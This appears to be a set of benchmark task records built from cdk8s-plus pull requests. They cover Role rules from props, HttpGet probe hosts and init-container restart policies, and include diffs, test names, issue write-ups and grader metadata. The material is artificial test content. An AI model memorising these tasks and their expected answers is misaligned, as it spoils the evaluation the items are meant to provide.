MetricTarget.averageUtilization()", "creates HPA with Resource CPU metric targeting the exact value of 29.5, when provided a MetricTarget.value()", "creates HPA, when target is a deployment", "creates HPA, when target is a StatefulSet", "creates HPA, when minReplicas is same as maxReplicas", "creates HPA with expected spec, when metrics, scaleUp, and scaleDown are all configured", "creates HPA, when metrics are not provided and one of the two target containers does not have any resources limits/requests", "throws error at synth, when metrics are not provided and target container does not have resource constraints specified", "throws error, when minReplicas is more than maxReplicas", "throws error, when scaleUp.stabilizationWindow is more than 1 hour", "throws error, when scaleDown.stabilizationWindow is more than 1 hour", "throws error, when scaleUp.stabilizationWindow is -1", "throws error, when scaleDown.stabilizationWindow is -1 seconds", "throws error, when scaleUp policy has a duration longer than 30 minutes", "throws error, when scaleDown policy has a duration longer than 30 minutes", "throws error, when scaleUp policy has a duration set to 0", "throws error, when scaleDown policy has a duration set to 0", "throws error, when scaleUp policy has a duration set to -10 minutes", "throws error, when scaleDown policy has a duration set to -10 minutes", "throws error at synth, when Deployment target has replicas defined", "throws error at synth, when StatefulSet target has replicas defined", "ipv4", "throws on invalid ipv4 cidr", "ipv6", "throws on invalid ipv6 cidr", "anyIpv4", "anyIpv6", "tcp", "tcpRange", "allTcp", "udp", "udpRange", "allUcp", "of", "can create a policy for a managed pod", "can create a policy for a managed workload resource", "can create a policy for selected pods", "can create a policy for all pods", "can create a policy that allows all ingress by default", "can create a policy that denies all ingress by default", "can create a policy that allows all egress by default", "can create a policy that denies all egress by default", "cannot create a policy for a selector that selects pods in multiple namespaces", "cannot create a policy for a selector that selects pods in namespaces based on labels", "policy namespace defaults to selector namespace", "can add ingress from an ip block", "can add ingress from a managed pod", "can add ingress from a managed workload resource", "can add ingress from pods selected without namespaces", "can add ingress from pods selected with namespaces selected by labes", "can add ingress from pods selected with namespaces selected by names", "can add ingress from all pods", "can add ingress from managed namespace", "can add ingress from selected namespaces", "can add ingress from all namespaces", "can add egress to an ip block", "can add egress to a managed pod", "can add egress to a managed workload resource", "can add egress to pods selected without namespaces", "can add egress to pods selected with namespaces selected by labes", "can add egress to pods selected with namespaces selected by names", "can add egress to all pods", "can add egress to managed namespace", "can add egress to selected namespaces", "can add egress to all namespaces", "Must be configured with at least one port", "Can provide cluster IP", "can select a deployment", "Can serve by port", "Must set externalIPs if provided", "Must be configured with externalName if type is EXTERNAL_NAME", "Type defaults to EXTERNAL_NAME if externalName if given", "Can restrict CIDR IP addresses for a LoadBalancer type", "can be exposed by an ingress" ]
Enum: ContainerRestartPolicy Location: src/container.ts Inputs: NONE (enum definition) Outputs: Enum values – ALWAYS = 'Always' Description: Enum that defines the allowed restart policy for init containers (currently only “Always”). Used to set the `restartPolicy` field on a Container when it is an init container. Method: Pod.addInitContainer(opts: { image: string; restartPolicy?: ContainerRestartPolicy; ... }) Location: src/pod.ts (adds support for the `restartPolicy` option in init‑container specifications) Inputs: - `image` (string, required) – container image. - `restartPolicy` (optional, ContainerRestartPolicy) – if set, the init container’s restart policy; only `ALWAYS` is allowed. - other Container options (env, resources, etc.). Outputs: Returns the created `Container` instance representing the init container. Description: Adds an init container to the pod. The call now accepts an optional `restartPolicy` property which is stored on the underlying `Container` and rendered as `restartPolicy` in the synthesized manifest. Method: Pod.constructor(scope, id, props?: { containers?: Array<{ image: string; restartPolicy?: ContainerRestartPolicy; ... }> ; ... }) Location: src/pod.ts (validation added in the pod synthesis path) Inputs: - `containers` array where each element may include a `restartPolicy` field of type `ContainerRestartPolicy`. Outputs: Throws `Error` with message `Invalid container spec: <name> has non‑empty restartPolicy field. The field can only be specified for initContainers` if any regular container defines `restartPolicy`. Description: Constructs a Pod. During synthesis the constructor now validates that the `restartPolicy` field is **not** present on regular containers; it is only permitted on init containers. This validation is exercised by the test that expects synthesis to fail when a normal container specifies `restartPolicy`.
Apache-2.0
{ "base_image_name": "node_16", "install": [ "npm install" ], "log_parser": "parse_log_js_4", "test_cmd": "npx jest --verbose --no-colors --testLocationInResults" }
{ "num_modified_files": 2, "num_modified_lines": 41, "pr_author": "serhatcetinkaya", "pr_labels": [ "backport-to-k8s-27/main: Backport a PR to the k8s-27 branch", "backport-to-k8s-28/main: Backport a PR to the k8s-28 branch" ], "llm_metadata": { "code": "A", "code_quality": null, "confidence": 0.93, "detected_issues": { "B1": false, "B2": false, "B3": false, "B4": false, "B5": false, "B6": false }, "detected_issues_explanation": null, "detecte d_issues": null, "difficulty": "medium", "external_urls": [ "https://github.com/kubernetes/enhancements/tree/e1a916745378660bafb96cb3c9f754fa793342f9/keps/sig-node/753-sidecar-containers" ], "intent_completeness": "complete", "patch": null, "pr_categories": [ "core_feat" ], "reason": null, "reasoning": "The issue requests adding a `restartPolicy` field to the Container API, limited to init containers, and includes a new snapshot test and a test asserting that the field on regular containers throws. The provided test changes align with these requirements: they import a new `ContainerRestartPolicy` enum, verify that the generated manifest contains the field for an init container, and assert an error for misuse. No test couplings, hidden dependencies, or ambiguous specifications are evident, so the task is cleanly solvable.", "suggested_fixes": null, "test_alignment": null, "test_alignment_issues": [], "test_alignment_quick_tree": null, "test_alignment_quick_tree_bootstrap": null, "test_alignment_quick_tree_mocks": null, "test_alignment_quick_tree_params": null, "test_alignment_quick_tree_unrelated": null, "test_alignment_quick_tree_use_hook": null, "test_alignment_quick_tree_use_hook_unrelated": null, "test_alignment_sample_without_replacement": null, "test_alignment_test_alignment_sample_without_replacement": null, "test_build_phylogeny": null, "test_build_phylogeny_unrelated": null, "test_build_phylogeny_use_hook": null, "test_build_phylogeny_use_hook_unrelated": null, "test_core_seq_test_sample_motif_length_1": null, "test_core_seq_test_sample_motif_length_3": null, "test_core_seq_test_sample_without_replacement": null, "test_core_sequence": null, "test_core_sequence_test_sample_motif_length_1": null, "test_core_sequence_test_sample_motif_length_3": null, "test_core_sequence_test_sample_without_replacement": null, "test_sample_motif_length_1": null, "test_sample_motif_length_3": null, "test_sample_without_replacement": null } }
b8b295b81d6d0bde79567988b79523e6226086e0
2024-03-01 08:13:32
cdk8s-team__cdk8s-plus-3813
diff --git a/src/role.ts b/src/role.ts index 4615a2b6..f0fa773c 100644 --- a/src/role.ts +++ b/src/role.ts @@ -104,6 +104,10 @@ export class Role extends base.Resource implements IRole { metadata: props.metadata, rules: Lazy.any({ produce: () => this.synthesizeRules() }), }); + + for (const rule of props.rules ?? []) { + this.allow(rule.verbs, ...rule.resources); + } } /** @@ -546,4 +550,4 @@ export class ClusterRole extends base.Resource implements IClusterRole, IRole { return { clusterRoleSelectors: [{ matchLabels: this._labelSelector }] }; } -} \ No newline at end of file +}
fix(role): use rules coming from the roleProps This fixes a bug where any rule given from roleProps is not used. the for loop exists for clusterRole but was missing on Role. a test is included to prevent breaking in future
**Title** Fix Role to honor permission rules supplied via role properties **Problem** When creating a Role, any policy rules passed through its configuration were ignored, leading to roles lacking the intended permissions. This discrepancy did not exist for ClusterRole, which correctly applied such rules. **Root Cause** The constructor for Role omitted the logic that iterates over the provided rule set and registers each rule with the role. **Fix / Expected Behavior** - Role now processes the list of rules supplied in its properties. - Each rule’s verbs and resources are added to the role’s policy. - When no rules are provided, the role behaves exactly as before. - Permission handling for Role matches the behavior of ClusterRole. - Added test guarantees that future changes will not regress this behavior. **Risk & Validation** - Verify that existing Role creations without explicit rules remain unaffected. - Ensure that duplicate rule handling and ordering remain consistent with prior implementation. - Run the full test suite, including the new test, to confirm correct rule application.
3,813
cdk8s-team/cdk8s-plus
diff --git a/test/role.test.ts b/test/role.test.ts index d63180de..e2314754 100644 --- a/test/role.test.ts +++ b/test/role.test.ts @@ -154,6 +154,32 @@ Array [ }); + test('specify access from props', () => { + + // GIVEN + const chart = Testing.chart(); + + // WHEN + new kplus.Role(chart, 'my-role', { + rules: [ + { + verbs: ['get', 'list', 'watch'], + resources: [kplus.ApiResource.PODS], + }, + ], + }); + + // THEN + const manifest = Testing.synth(chart); + expect(manifest[0].rules).toEqual(expect.arrayContaining([ + { + apiGroups: [''], + resources: ['pods'], + verbs: ['get', 'list', 'watch'], + }, + ])); + }); + test('giving access to a single pod and all pods still gives access to all pods', () => { // GIVEN @@ -546,4 +572,4 @@ Object { }); -}); \ No newline at end of file +});
[ "specify access from props" ]
[ "fromCommand", "fromHttpGet", "fromTcpSocket", "can grant permissions on imported", "role can bind to imported", "defaultChild", "minimal definition", "secrets can be added to the service account", "auto mounting token can be disabled", "defaults to the container port", "specific port", "options", "minimal usage", "specific port and hostname", "default child", "defaults", "custom", "a label selector is automatically allocated", "no selector is generated if \"select\" is false", "can select by label", "Can be isolated", "Can mutate metadata", "default configuration", "custom configuration", "can create a RoleBinding from a Role", "can create a RoleBinding from a ClusterRole", "can call bindInNamespace multiple times", "can create a ClusterRoleBinding from a ClusterRole", "can bind a ServiceAccount to a role", "can add subjects to a RoleBinding after creating it", "Allows setting all options", "Applies default restart policy to pod spec", "Does not modify existing restart policy of pod spec", "Synthesizes spec lazily", "A label selector is automatically allocated", "No selector is generated if \"select\" is false", "Can select by label", "StatefulSet gets defaults", "StatefulSet allows overrides", "default update strategy", "custom update strategy", "targets a deployment that has containers with volume mounts", "creates HPA with 2 default scaleUp policies and 1 default scaleDown policy, when all other scaleUp and scaleDown options are provided", "creates HPA with scaleUp and scaleDown policies with the default 15 second periodSeconds, when policies are provided without duration option", "creates HPA with two different scaling strategies, when provided a scaleUp strategy of Max and scaleDown strategy of Min", "creates HPA with CPU ContainerResource metric, when provided a Metric.containerCpu()", "creates HPA with Memory ContainerResource metric, when provided a Metric.containerMemory()", "creates HPA with Storage ContainerResource metric, when provided a Metric.containerStorage()", "creates HPA with Ephemeral Storage ContainerResource metric, when provided a Metric.containerStorage()", "creates HPA with external metric, when provided a Metric.external()", "creates HPA with object metric, when provided a Metric.object()", "creates HPA with pods metric, when provided a Metric.pods()", "creates HPA with Resource CPU metric, when provided a Metric.resourceCpu()", "creates HPA with Resource Memory metric, when provided a Metric.resourceMemory()", "creates HPA with Resource Storage metric, when provided a Metric.resourceStorage()", "creates HPA with Resource Ephemeral Storage metric, when provided a Metric.resourceEphemeralStorage()", "creates HPA with Resource CPU metric targeting 70% average utilization, when provided a MetricTarget.averageUtilization()", "creates HPA with Resource CPU metric targeting 47.2 average value, when provided a MetricTarget.averageUtilization()", "creates HPA with Resource CPU metric targeting the exact value of 29.5, when provided a MetricTarget.value()", "creates HPA, when target is a deployment", "creates HPA, when target is a StatefulSet", "creates HPA, when minReplicas is same as maxReplicas", "creates HPA with expected spec, when metrics, scaleUp, and scaleDown are all configured", "creates HPA, when metrics are not provided and one of the two target containers does not have any resources limits/requests", "throws error at synth, when metrics are not provided and target container does not have resource constraints specified", "throws error, when minReplicas is more than maxReplicas", "throws error, when scaleUp.stabilizationWindow is more than 1 hour", "throws error, when scaleDown.stabilizationWindow is more than 1 hour", "throws error, when scaleUp.stabilizationWindow is -1", "throws error, when scaleDown.stabilizationWindow is -1 seconds", "throws error, when scaleUp policy has a duration longer than 30 minutes", "throws error, when scaleDown policy has a duration longer than 30 minutes", "throws error, when scaleUp policy has a duration set to 0", "throws error, when scaleDown policy has a duration set to 0", "throws error, when scaleUp policy has a duration set to -10 minutes", "throws error, when scaleDown policy has a duration set to -10 minutes", "throws error at synth, when Deployment target has replicas defined", "throws error at synth, when StatefulSet target has replicas defined", "can be imported", "can be reserved with default storage class", "can be reserved with a custom storage class", "reserved claim is created in the same namespace as the volume", "throws if reserved twice", "can be bound to a claim at instantiation", "can be bound to a claim post instantiation", "no-ops if bounded twice to the same claim", "throws if bounded twice to different claims", "with a custom resource rule", "can be allowed read access to a pod and secret", "can be allowed read access to a mix of resources", "giving access to a single pod and all pods still gives access to all pods", "can be allowed read access to all pods and secrets in a namespace", "can be allowed read access to a custom resource type", "can be allowed access to a specific resource and a resource type", "with a custom non-resource rule", "can be allowed read access to all pods and secrets in the cluster", "can be allowed access to a specific resource, a resource type, and non resource endpoints", "can be aggregated", "custom aggregation labels can be added", "ipv4", "throws on invalid ipv4 cidr", "ipv6", "throws on invalid ipv6 cidr", "anyIpv4", "anyIpv6", "tcp", "tcpRange", "allTcp", "udp", "udpRange", "allUcp", "of", "can create a policy for a managed pod", "can create a policy for a managed workload resource", "can create a policy for selected pods", "can create a policy for all pods", "can create a policy that allows all ingress by default", "can create a policy that denies all ingress by default", "can create a policy that allows all egress by default", "can create a policy that denies all egress by default", "cannot create a policy for a selector that selects pods in multiple namespaces", "cannot create a policy for a selector that selects pods in namespaces based on labels", "policy namespace defaults to selector namespace", "can add ingress from an ip block", "can add ingress from a managed pod", "can add ingress from a managed workload resource", "can add ingress from pods selected without namespaces", "can add ingress from pods selected with namespaces selected by labes", "can add ingress from pods selected with namespaces selected by names", "can add ingress from all pods", "can add ingress from managed namespace", "can add ingress from selected namespaces", "can add ingress from all namespaces", "can add egress to an ip block", "can add egress to a managed pod", "can add egress to a managed workload resource", "can add egress to pods selected without namespaces", "can add egress to pods selected with namespaces selected by labes", "can add egress to pods selected with namespaces selected by names", "can add egress to all pods", "can add egress to managed namespace", "can add egress to selected namespaces", "can add egress to all namespaces", "Can be imported from secret name", "Can create a new secret", "Can add data to new secrets", "Can create a basic auth secret", "can override the name of a basic auth secret", "Can create an ssh auth secret", "can override the name of an ssh auth secret", "Can create a service account token secret", "can override the name of a service account token secret", "can add annotations to a service account token secret", "Can create a TLS secret", "can override the name of a tls secret", "Can create a Docker config secret", "can override the name of a DockerConfig secret", "default immutability", "can configure an immutable generic secret", "can configure an immutable basic auth secret", "can configure an immutable ssh auth secret", "can configure an immutable service account token secret", "can configure an immutable tls secret", "can configure an immutable docker config secret", "Can add only resource requests", "Can add only resource limits", "Can add only limits and requests on memory", "Can add only limits and requests on cpu", "Can add only limits and requests on emphemeral-storage", "Can add only limits on emphemeral-storage", "default security context", "custom security context", "can configure a postStart lifecycle hook", "can configure a preStop lifecycle hook", "Can be created from value", "Can be created from config map name", "Can be created from secret value", "Can be created from ISecret.envValue", "Can be created from new secret.envValue", "Cannot be created from missing required process env", "Can be created from missing optional process env", "Can be created from existing process env", "Can be created from fieldRef", "Can be created from fieldRef with key", "Can not be created from fieldRef without key", "Can be created from resourceFieldRef", "Can be created from resourceFieldRef with divisor", "Can be created from resourceFieldRef with container", "cannot configure identical ports and protocols at instantiation", "can configure identical ports with different protocols at instantiation", "cannot add an already existing port number with identical protocol", "can add an already existing port number with a different protocol", "cannot add an already existing port name", "can configure multiple ports", "portNumber is equivalent to port", "Instantiation properties are all respected", "Must use container props", "Can add environment variable", "can add environment variables from a source", "can add environment variables from a secret", "Can mount container to volume", "can mount container to a pv", "mount options", "mount from ctor", "\"startupProbe\" property has defaults if port is provided", "\"startupProbe\" property is undefined if port is not provided", "\"restartPolicy\" property can be used to define restartPolicy", "\"readiness\", \"liveness\", and \"startup\" can be used to define probes", "Can add resource limits and requests", "volume name is trimmed if needed", "custom volume name", "default mode", "optional", "items", "items are sorted by key for deterministic synthesis", "items are sorted by key for determinstic synthesis", "default medium", "memory medium", "size limit", "can be bounded to a volume at instantiation", "can be bounded to a volume post instantiation", "no-ops if bounded twice to the same volume", "throws if bounded twice to different volumes", "Can be exposed as via ingress", "Expose uses the correct default values", "Expose can set service and port details", "Cannot be exposed if there are no containers in spec", "default deployment strategy", "custom deployment strategy", "rolling update deployment strategy with a custom maxSurge and maxUnavailable", "throws is maxSurge and maxUnavailable is set to zero for rolling update", "PercentOrAbsoulte zero", "default minReadySeconds", "default progressDeadlineSeconds", "can configure minReadySeconds", "can configure progressDeadlineSeconds", "throws if minReadySeconds > progressDeadlineSeconds", "throws if minReadySeconds = progressDeadlineSeconds", "can select with expressions", "exposing via a service preserves deployment namespace", "expose captures all container ports", "cannot expose with a port not owned by the container", "expose via service with multiple ports throws error when names are not provided", "can tolerate tainted nodes", "can be assigned to a node by name", "can be attracted to a node by selector - default", "can be attracted to a node by selector - custom", "can be co-located with a managed deployment - default", "can be co-located with a managed deployment - custom", "can be co-located with an unmanaged deployment - default", "can be co-located with an unmanaged deployment - custom", "can be spread - default", "can be spread - custom", "spread set to true", "can be separated from a managed deployment - default", "can be separated from a managed deployment - custom", "can be separated from an unmanaged deployment - default", "can be separated from an unmanaged deployment - custom", "IngressClassName can be set", "fromResource", "if the service exposes a port, it will be used by the ingress", "fails if the service does not expose a port", "fails if a port is explicitly specified, and the service is exposed through a different port", "service exposes a single port and its the same as the backend", "service exposes multiple ports and the backend uses one of them", "fails if backend does not specify port and service exposes multiple ports", "service exposes multiple ports and backend uses a different one", "addHostDefaultBackend()", "addHostRule()", "addRule()", "define rules upon initialization", "fails if path does not begin with \"/\"", "fails if no rules or default backend are specified", "addTls()", "define tls upon initialization", "defaultBackend property", "addDefaultBackend()", "using addDefaultBackend()", "defaultBackend and rules", "two rules for the same path (no host)", "two rules for the same path and host", "can select namespaces", "can select all namespaces", "minimal", "with data", "with binaryData", "with binaryData and data", "\"binaryData\" and \"data\" cannot share keys", "addData()/addBinaryDataq() can be used to add data", "addData() and addBinaryData() throw if key already used", "addFile() adds local files to the config map", "metadata is synthesized", "can configure an immutable config map", "sub-directories are skipped", "keys are based on file names", "\"prefix\" can be used to prefix keys\"", "\"exclude\" exclusion via globs", "Must be configured with at least one port", "Can provide cluster IP", "can select a deployment", "Can serve by port", "Must set externalIPs if provided", "Must be configured with externalName if type is EXTERNAL_NAME", "Type defaults to EXTERNAL_NAME if externalName if given", "Can restrict CIDR IP addresses for a LoadBalancer type", "can be exposed by an ingress", "fails with two volumes with the same name", "fails adding a volume with the same name", "fails with a container that has mounts with different volumes of the same name", "can configure multiple mounts with the same volume", "Can add container post instantiation", "Can attach an existing container post instantiation", "Must have at least one container", "Can add volume post instantiation", "Automatically adds volumes from container mounts", "init containers cannot have liveness probe", "init containers cannot have readiness probe", "init containers cannot have startup probe", "can specify init containers at instantiation", "can add init container post instantiation", "init container names are indexed", "automatically adds volumes from init container mounts", "custom host aliases", "default dns settings", "custom dns settings", "throws if more than 3 nameservers are configured", "throws if more than 6 search domains are configured", "throws if no nameservers are given when dns policy is set to NONE", "can configure auth to docker registry", "auto mounting token defaults to true", "can select pods", "can pass an existing secret as the docker auth", "can add hostNetwork to pod", "pod hostNetwork is not added by default", "default termination grace period", "custom termination grace period", "custom termination grace period - minutes", "Containers should not specify \"restartPolicy\" field", "only NO_EXECUTE taint queries can specify eviction", "can be co-located with a managed pod - default", "can be co-located with a managed pod - custom", "can be co-located with an unmanaged pod - default", "can be co-located with an unmanaged pod - custom", "can be separated from a managed pod - default", "can be separated from a managed pod - custom", "can be separated from an unmanaged pod - default", "can be separated from an unmanaged pod - custom", "can allow to ip block", "can isolate pod", "can allow to managed pod", "can allow to managed workload resource", "can allow to pods selected without namespaces", "can allow to pods selected with namespaces selected by names", "cannot allow to pods selected with namespaces selected by labels", "cannot allow to pods selected in all namespaces", "can allow to all pods", "can allow to managed namespace", "can allow to namespaces selected by name", "cannot allow to namespaces selected by labels", "can allow to peer across namespaces", "can allow to multiple peers", "cannot allow to the same peer twice", "allow to create an ingress policy in source namespace when peer doesnt define namespaces", "allow to with peer isolation creates only ingress policy on peer", "allow to with pod isolation creates only egress policy on pod", "allow to defaults to peer container ports", "can allow from ip block", "can allow from managed pod", "can allow from managed workload resource", "can allow from pods selected without namespaces", "can allow from pods selected with namespaces selected by names", "cannot allow from pods selected with namespaces selected by labels", "cannot allow from pods selected in all namespaces", "can allow from all pods", "can allow from managed namespace", "can allow from namespaces selected by name", "cannot allow from namespaces selected by labels", "can allow from peer across namespaces", "can allow from multiple peers", "cannot allow from the same peer twice", "allow from create an ingress policy in source namespace when peer doesnt define namespaces", "allow from with peer isolation creates only ingress policy on peer", "allow from with pod isolation creates only egress policy on pod", "allow from defaults to peer container ports", "can grant read permissions to a user", "can grant read permissions to a group", "can grant read permissions to a service account", "can grant read permissions to another pod", "can grant read permissions to workload", "can grant read permissions twice with different subjects", "cannot grant permissions twice with same subject" ]
Method: Role(scope: Construct, id: string, props: RoleProps) Location: src/role.ts Inputs: - scope – the construct (e.g., a Chart) in which the Role is defined. - id – logical ID of the Role construct. - props – RoleProps object; may include an optional `rules` array where each rule has `verbs: string[]` and `resources: ApiResource[]` (e.g., `[kplus.ApiResource.PODS]`). Outputs: An instance of `kplus.Role` that is added to the chart; during synthesis the supplied `rules` are translated into Kubernetes Role manifest entries (`apiGroups`, `resources`, `verbs`). Description: Constructs a Kubernetes Role resource, now respecting any policy rules passed via `props.rules` by invoking `allow` for each rule, so that the synthesized manifest contains the expected access rules.
Apache-2.0
{ "base_image_name": "node_16", "install": [ "npm install" ], "log_parser": "parse_log_js_4", "test_cmd": "npx jest --verbose --no-colors --testLocationInResults" }
{ "num_modified_files": 1, "num_modified_lines": 5, "pr_author": "serhatcetinkaya", "pr_labels": [ "backport-to-k8s-27/main: Backport a PR to the k8s-27 branch", "backport-to-k8s-28/main: Backport a PR to the k8s-28 branch" ], "llm_metadata": { "code": "A", "code_quality": null, "confidence": 0.99, "detected_issues": { "B1": false, "B2": false, "B3": false, "B4": false, "B5": false, "B6": false }, "detected_issues_explanation": null, "detecte d_issues": null, "difficulty": "easy", "external_urls": [], "intent_completeness": "complete", "patch": null, "pr_categories": [ "minor_bug" ], "reason": null, "reasoning": "The issue requests that Role objects honor rules passed via roleProps, mirroring existing ClusterRole behavior. The added test asserts that the synthesized manifest includes those rules, directly matching the stated requirement. No misalignment with the test suite is observed and there are no external dependencies or ambiguous specifications. Therefore the task is well‑defined and solvable (code A).", "suggested_fixes": null, "test_alignment": null, "test_alignment_issues": [], "test_alignment_quick_tree": null, "test_alignment_quick_tree_bootstrap": null, "test_alignment_quick_tree_mocks": null, "test_alignment_quick_tree_params": null, "test_alignment_quick_tree_unrelated": null, "test_alignment_quick_tree_use_hook": null, "test_alignment_quick_tree_use_hook_unrelated": null, "test_alignment_sample_without_replacement": null, "test_alignment_test_alignment_sample_without_replacement": null, "test_build_phylogeny": null, "test_build_phylogeny_unrelated": null, "test_build_phylogeny_use_hook": null, "test_build_phylogeny_use_hook_unrelated": null, "test_core_seq_test_sample_motif_length_1": null, "test_core_seq_test_sample_motif_length_3": null, "test_core_seq_test_sample_without_replacement": null, "test_core_sequence": null, "test_core_sequence_test_sample_motif_length_1": null, "test_core_sequence_test_sample_motif_length_3": null, "test_core_sequence_test_sample_without_replacement": null, "test_sample_motif_length_1": null, "test_sample_motif_length_3": null, "test_sample_without_replacement": null } }
acc315749224bc89ad4ff81a86d78a991d5c9787
2024-03-01 11:27:25
cdk8s-team__cdk8s-plus-3818
diff --git a/src/_action.ts b/src/_action.ts index a1c7bc6c..40bb8d88 100644 --- a/src/_action.ts +++ b/src/_action.ts @@ -21,11 +21,16 @@ export class Action { return { command }; } - public static fromHttpGet(container: Container, path: string, options: { port?: number; scheme?: ConnectionScheme } = { }): k8s.HttpGetAction { + public static fromHttpGet(container: Container, path: string, options: { + port?: number; + scheme?: ConnectionScheme; + host?: string; + } = {}): k8s.HttpGetAction { return { path, port: k8s.IntOrString.fromNumber(options.port ?? container.portNumber ?? 80), scheme: options.scheme ?? ConnectionScheme.HTTP, + host: options.host, }; } -} \ No newline at end of file +} diff --git a/src/probe.ts b/src/probe.ts index e10fc8e8..048e619c 100644 --- a/src/probe.ts +++ b/src/probe.ts @@ -85,6 +85,13 @@ export interface HttpGetProbeOptions extends ProbeOptions { * @default ConnectionScheme.HTTP */ readonly scheme?: ConnectionScheme; + + /** + * The host name to connect to on the container. + * + * @default - defaults to the pod IP + */ + readonly host?: string; } /**
feat(probe): add `host` property to HttpGet probes HttpGet probes has `host` field. Added support for it in cdk8s-plus: https://kubernetes.io/docs/reference/generated/kubernetes-api/v1.26/#httpgetaction-v1-core
**Title** Add support for specifying a custom host in HTTP GET probes **Problem** HTTP GET probes always target the pod IP, making it impossible to direct probes to a specific hostname when required (e.g., when using virtual hosts or DNS overrides). **Root Cause** The probe abstraction does not expose the `host` field of the underlying Kubernetes `HttpGetAction`, so callers cannot set it. **Fix / Expected Behavior** - Introduce an optional `host` property in the HTTP GET probe options. - Forward the provided `host` value to the generated `HttpGetAction` sent to the Kubernetes API. - Preserve existing defaults (pod IP) when the property is omitted. - Ensure the new option integrates with existing probe configuration APIs without altering current behavior. **Risk & Validation** - Verify that probes with a custom host are correctly rendered in the manifest and accepted by the API server. - Run existing unit and integration tests to confirm no regressions in probe handling. - Add tests covering the new `host` option to ensure proper defaulting and propagation.
3,818
cdk8s-team/cdk8s-plus
diff --git a/test/probe.test.ts b/test/probe.test.ts index 17946ea5..8040b027 100644 --- a/test/probe.test.ts +++ b/test/probe.test.ts @@ -57,6 +57,7 @@ describe('fromHttpGet()', () => { periodSeconds: Duration.seconds(5), successThreshold: 3, timeoutSeconds: Duration.minutes(2), + host: '1.1.1.1', }); // THEN @@ -65,6 +66,7 @@ describe('fromHttpGet()', () => { path: '/hello', port: k8s.IntOrString.fromNumber(5555), scheme: 'HTTP', + host: '1.1.1.1', }, failureThreshold: 11, initialDelaySeconds: 60,
[ "defaults to the container port", "specific port", "options", "minimal usage", "specific port and hostname" ]
[ "fromCommand", "fromHttpGet", "fromTcpSocket", "Can mutate metadata", "minimal definition", "volume name is trimmed if needed", "custom volume name", "default mode", "optional", "items", "items are sorted by key for deterministic synthesis", "items are sorted by key for determinstic synthesis", "default medium", "memory medium", "size limit", "defaults", "custom", "default child", "a label selector is automatically allocated", "no selector is generated if \"select\" is false", "can select by label", "Can be isolated", "defaultChild", "default configuration", "custom configuration", "can grant permissions on imported", "minimal", "with data", "with binaryData", "with binaryData and data", "\"binaryData\" and \"data\" cannot share keys", "addData()/addBinaryDataq() can be used to add data", "addData() and addBinaryData() throw if key already used", "addFile() adds local files to the config map", "metadata is synthesized", "can configure an immutable config map", "sub-directories are skipped", "keys are based on file names", "\"prefix\" can be used to prefix keys\"", "\"exclude\" exclusion via globs", "can be imported", "can be bounded to a volume at instantiation", "can be bounded to a volume post instantiation", "no-ops if bounded twice to the same volume", "throws if bounded twice to different volumes", "role can bind to imported", "secrets can be added to the service account", "auto mounting token can be disabled", "can be reserved with default storage class", "can be reserved with a custom storage class", "reserved claim is created in the same namespace as the volume", "throws if reserved twice", "can be bound to a claim at instantiation", "can be bound to a claim post instantiation", "no-ops if bounded twice to the same claim", "throws if bounded twice to different claims", "IngressClassName can be set", "fromResource", "if the service exposes a port, it will be used by the ingress", "fails if the service does not expose a port", "fails if a port is explicitly specified, and the service is exposed through a different port", "service exposes a single port and its the same as the backend", "service exposes multiple ports and the backend uses one of them", "fails if backend does not specify port and service exposes multiple ports", "service exposes multiple ports and backend uses a different one", "addHostDefaultBackend()", "addHostRule()", "addRule()", "define rules upon initialization", "fails if path does not begin with \"/\"", "fails if no rules or default backend are specified", "addTls()", "define tls upon initialization", "defaultBackend property", "addDefaultBackend()", "using addDefaultBackend()", "defaultBackend and rules", "two rules for the same path (no host)", "two rules for the same path and host", "A label selector is automatically allocated", "No selector is generated if \"select\" is false", "Can select by label", "StatefulSet gets defaults", "StatefulSet allows overrides", "Synthesizes spec lazily", "default update strategy", "custom update strategy", "Allows setting all options", "Applies default restart policy to pod spec", "Does not modify existing restart policy of pod spec", "Can be exposed as via ingress", "Expose uses the correct default values", "Expose can set service and port details", "Cannot be exposed if there are no containers in spec", "default deployment strategy", "custom deployment strategy", "rolling update deployment strategy with a custom maxSurge and maxUnavailable", "throws is maxSurge and maxUnavailable is set to zero for rolling update", "PercentOrAbsoulte zero", "default minReadySeconds", "default progressDeadlineSeconds", "can configure minReadySeconds", "can configure progressDeadlineSeconds", "throws if minReadySeconds > progressDeadlineSeconds", "throws if minReadySeconds = progressDeadlineSeconds", "can select with expressions", "exposing via a service preserves deployment namespace", "expose captures all container ports", "cannot expose with a port not owned by the container", "expose via service with multiple ports throws error when names are not provided", "can tolerate tainted nodes", "can be assigned to a node by name", "can be attracted to a node by selector - default", "can be attracted to a node by selector - custom", "can be co-located with a managed deployment - default", "can be co-located with a managed deployment - custom", "can be co-located with an unmanaged deployment - default", "can be co-located with an unmanaged deployment - custom", "can be spread - default", "can be spread - custom", "spread set to true", "can be separated from a managed deployment - default", "can be separated from a managed deployment - custom", "can be separated from an unmanaged deployment - default", "can be separated from an unmanaged deployment - custom", "Can add only resource requests", "Can add only resource limits", "Can add only limits and requests on memory", "Can add only limits and requests on cpu", "Can add only limits and requests on emphemeral-storage", "Can add only limits on emphemeral-storage", "default security context", "custom security context", "can configure a postStart lifecycle hook", "can configure a preStop lifecycle hook", "Can be created from value", "Can be created from config map name", "Can be created from secret value", "Can be created from ISecret.envValue", "Can be created from new secret.envValue", "Cannot be created from missing required process env", "Can be created from missing optional process env", "Can be created from existing process env", "Can be created from fieldRef", "Can be created from fieldRef with key", "Can not be created from fieldRef without key", "Can be created from resourceFieldRef", "Can be created from resourceFieldRef with divisor", "Can be created from resourceFieldRef with container", "cannot configure identical ports and protocols at instantiation", "can configure identical ports with different protocols at instantiation", "cannot add an already existing port number with identical protocol", "can add an already existing port number with a different protocol", "cannot add an already existing port name", "can configure multiple ports", "portNumber is equivalent to port", "Instantiation properties are all respected", "Must use container props", "Can add environment variable", "can add environment variables from a source", "can add environment variables from a secret", "Can mount container to volume", "can mount container to a pv", "mount options", "mount from ctor", "\"startupProbe\" property has defaults if port is provided", "\"startupProbe\" property is undefined if port is not provided", "\"readiness\", \"liveness\", and \"startup\" can be used to define probes", "Can add resource limits and requests", "can create a RoleBinding from a Role", "can create a RoleBinding from a ClusterRole", "can call bindInNamespace multiple times", "can create a ClusterRoleBinding from a ClusterRole", "can bind a ServiceAccount to a role", "can add subjects to a RoleBinding after creating it", "targets a deployment that has containers with volume mounts", "creates HPA with 2 default scaleUp policies and 1 default scaleDown policy, when all other scaleUp and scaleDown options are provided", "creates HPA with scaleUp and scaleDown policies with the default 15 second 